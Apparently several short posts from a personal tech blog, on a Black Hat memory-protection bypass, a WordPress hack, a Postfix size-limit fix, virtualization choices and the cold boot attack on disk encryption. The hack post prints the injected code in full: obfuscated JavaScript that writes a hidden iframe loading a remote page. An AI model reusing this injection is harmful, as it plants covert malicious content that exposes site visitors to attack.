It seems, at least according to some researchers showed it at the Black Hat conference.
Mark Dowd (IBM) and Alexander Sotirov (VMWare) found a way to bypass the memory protection implemented in Vista to inject malicious instructions within Internet Explorer. They were able to copy any content wherever they wished on the disk.
Especially, this paper will be an interesting reading, even if it is not as simple as they say – at least for me.
This blog got hacked yesterday.
It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress.
It was not just like the classic SQL injection that is usually used to post some malicious post.
The following code was added :
<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>
I suddenly started to received some undelivered mail notifications while I was trying to send some messages to a mailbox hosted on my Postfix server.
The cause described in the notification was :
error writing message: File too large
The first thing I did was checking my configuration file, main.cf.
It seemed all right :
[...] mailbox_size_limit = 0 message_size_limit = 200000000 [...]
Note that “0” means unlimited.
I checked the mailbox in question : it was nearing the size of 50 Mb.
I started to think that during some Postfix update, the meaning of the value “0” may have changed.
I tried different values without success.
I started to become crazy with that, but, finally, after quite a long time spent on google, I finally found the trick, which is just a simple line to add in main.cf :
virtual_mailbox_limit = 0
Indeed, I use virtual users as mail account ! I just never imagined there was a differtent setting for virtual users (which can be a convenient setting in some case).
I was planning to give a try to Xen for my future virtual servers.
This blog made me think twice. I think I am going to check KVM first.
Since the new cold boot attack hack is on the news, touching most of the software encryption solutions, I have wondered if it had any chance to concern also hardware encryption.
Hardware encryption is provided by a few laptop makers, generally on high-range an business models.
It has much less performance impact than software encryption, and protect the data independently from your system configuration and its partitions.
Full disk encryption is the so called hardware encryption technology used by Lenovo on my Thinkpad.
Damned !
A team of researchers found a way to defeat all the most common disk encryption methods – including dm-crypt for Linux that I previously described on this blog.
A team of researchers found a way to defeat all the most common disk encryption methods – including dm-crypt for Linux that I previously described on this blog.
All systems are actually concerned, because the attack is low level. It is based on the RAM chips properties. After shutdown, and therefore no more electricity powering, a chip will still contain some readable information during a few seconds.
The data contained is deteriorating, but for example if you cool the chip enough, for example with a computer dry air dust cleaner, you can keep the data several minutes !
The problem concerning data encryption is that the decryption key is kept in RAM, and that way be stolen to read all your data.
The attack would not so easy in practice, if suspend-to-ram did not exist.
But as many users, including me, use heavily suspend-to-ram with their laptop, this issue is rather problematic…
The team provides a rather impressive video :
I no longer use dm-crypt since my Thinkpad provides hardware encryption, but I wonder now where the key is stored in my case. I don’t think it is in RAM, but I have to check it to make sure.I will do it tomorrow, since I need to rest now.